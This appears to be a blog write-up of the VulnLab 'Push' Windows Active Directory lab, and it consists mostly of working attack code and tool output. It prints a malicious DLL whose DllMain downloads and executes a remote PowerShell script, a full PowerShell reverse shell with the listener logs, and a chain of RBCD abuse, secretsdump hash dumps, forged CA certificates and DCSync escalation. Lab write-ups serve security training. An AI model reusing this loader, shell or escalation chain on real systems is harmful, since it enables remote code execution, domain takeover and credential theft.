vulnlab-push

vulnlab-push

a hard windows machine

preperation

create puck.c on kali box

puck.c contains:

#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    switch(dwReason){
        case DLL_PROCESS_ATTACH:

            system("powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://192.168.36.116:9000/puckshell.txt')))");


            break;
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

create malicious dll

puck@kali:~$ x86_64-w64-mingw32-gcc ./puck.c -shared -o puck.dll
puck@kali:~$ file puck.dll
puck.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows

puckshell.txt contains:

function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '192.168.1.136'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

on attacker pc run http listener and nc listener

c:\PENTEST>python3 -m http.server 9000
Serving HTTP on :: port 9000 (http://[::]:9000/) ...
::ffff:192.168.36.91 - - [22/Jul/2024 10:49:46] "GET /puckshell.txt HTTP/1.1" 200 -
::ffff:192.168.36.91 - - [22/Jul/2024 10:50:32] "GET /puckshell.txt HTTP/1.1" 200 -
c:\PENTEST>nc64.exe -nlvp 443
listening on [any] 443 ...
connect to [192.168.36.116] from (UNKNOWN) [192.168.36.91] 58868
Microsoft Windows [Version 10.0.22631.3880]
(c) Microsoft Corporation. Alle rechten voorbehouden.

C:\Windows\System32>whoami
fakedomain\hillie

test on windows target with

rundll32.exe C:\Payloads\puck.dll,XYZ

If all tests are succesfull, we continue to the writeup.

Writeup :

To abuse clickonce we follow article , we need to upload our SelfService.dll.deploy , which will download and execute a reverse shell.

More to come …\

With shell as kelly.hill we find her credentials in her homefolder

evil-winrm --ip ms01.push.vl -u 'kelly.hill' -p 'Sh<redacted>!' 
xfreerdp  /u:kelly.hill /p:'Sh<redacted>!' /v:ms01.push.vl /cert:ignore /rfx

Bloodhound Analysis:

bloodhound-python -d push.vl -v --zip -c all -u 'olivia.wood' -p 'DeployTrust07' -ns 10.10.198.149 --dns-tcp

Check Machine Quota

crackmapexec ldap dc01.push.vl -u "Olivia.Wood" -p "DeployTrust07" -M maq

 

RBCD abuse

From bloodhound we see kelly.hill First Degree Object Control , has AllExtendedRights and WriteAccountRestrictions on MS01, which means that we can read all properties on MS01 and we can edit msDS-AllowedToActOnBehalfOfOtherIdentity to perform RBCD (Resource based constrained delegation) by having write account restrictions rights

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-addcomputer -method LDAPS -computer-name 'puckie' -computer-pass 'Summer2024!' -dc-host dc01.push.vl -domain-netbios push.vl 'push.vl/kelly.hill:Sh<redacted>i!'     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Successfully added machine account puckie$ with password Summer2024!.
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-rbcd -delegate-from 'puckie$' -delegate-to 'MS01$' -action 'write' 'push.vl/kelly.hill:Sh<redacted>i!' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*] Delegation rights modified successfully!
[*] puckie$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     puckie$      (S-1-5-21-1451457175-172047642-1427519037-3603)
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-getST -spn 'cifs/ms01.push.vl' -impersonate 'administrator' 'push.vl/puckie$:Summer2024!'  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ms01.push.vl@PUSH.VL.ccache
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ export KRB5CCNAME=administrator@cifs_ms01.push.vl@PUSH.VL.ccache            

                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump -k ms01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8<redacted>61:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#33<redacted>09: (2023-08-31 18:27:31)
PUSH.VL/Kelly.Hill:$DCC2$10240#Kelly.Hill#b0<redacted>29: (2023-09-02 11:17:04)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c<redacted>5c: (2023-08-31 10:26:08)

Now that we have the Administrator hash of ms01

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ evil-winrm --ip ms01.push.vl -u 'Administrator' -H 'd8<redacted>61'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\kelly.hill\documents> dir


    Directory: C:\Users\kelly.hill\documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/25/2024   7:39 AM        1125376 SharpSCCM.exe


*Evil-WinRM* PS C:\Users\kelly.hill\documents> .\SharpSCCM.exe local site-info

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
-----------------------------------
SMS_Authority
-----------------------------------
CurrentManagementPoint: DC01.push.vl
Name: SMS:HQ0
-----------------------------------
[+] Completed execution in 00:00:00.2090991
*Evil-WinRM* PS C:\Users\kelly.hill\documents> 


.

┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py find -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps 
SCCMHunter v1.0.5 by @garrfoster
[10:15:22] INFO     [*] Checking for System Management Container.                                                    
[10:15:22] INFO     [+] Found System Management Container. Parsing DACL.                                             
[10:15:22] INFO     [-] System Management Container not found.                                                       
[10:15:22] INFO     [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM'                          
[10:15:23] INFO     [-] No results found.                                                                            
                                                                                                                     
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py smb -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps 
SCCMHunter v1.0.5 by @garrfoster
[10:17:30] INFO     [-] No SiteServers found in database.                                                            
[10:17:30] INFO     [-] No Management Points found in database.                                                      
[10:17:30] INFO     [-] No computers found in database.

I could not solve sccadmin exploit .

It should run like below , and giving the hash in responder

PS C:\Users\kelly.hill\Documents> .\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0
.\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:

    308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A00207D0

[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
      FQDN: 10.8.2.138
      NetBIOS name: 10.8.2.138
      Site code: HQ0
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:

    GUID:7D070746-617E-4763-9835-F7811A6BED54

[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:7D070746-617E-4763-9835-F7811A6BED54 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.0.233
[+] Completed execution in 00:00:06.9340974

.

As we now have the pass of user sccadmin , we do a Golden Ticket attack

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ crackmapexec smb dc01.push.vl -u "sccadmin" -p "7u<redacted>JM"          
SMB         DC01.push.vl    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
SMB         DC01.push.vl    445    DC01             [+] push.vl\sccadmin:7u<redacted>JM 

golden Cerificate attack with certipy-ad & passthecert possible because we have system access to ms01 ( which is the CA )

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad ca -u sccadmin -p '7u<redacted>JM' -target-ip MS01.push.vl -backup
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Creating new service
[*] Creating backup
[*] Retrieving backup
[*] Got certificate and private key
[*] Saved certificate and private key to 'CA.pfx'
[*] Cleaning up
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved forged certificate and private key to 'administrator_forged.pfx'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nokey -out administrator.crt
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing certificate and  to 'administrator.crt'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nocert -out administrator.key
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing private key to 'administrator.key'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target kelly.hill -elevate -domain push.vl -dc-host dc01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Granted user 'kelly.hill' DCSYNC rights!
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump kelly.hill@DC01.push.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d<redacted>0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9fd5a3d1406ca03668fcd04a0b4eb09:::
push.vl\svcsql:1104:aad3b435b51404eeaad3b435b51404ee:19<redacted>85:::

That was fun 🙂

.

references used

sccm

PassTheCert

sharpcollection

 

.

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *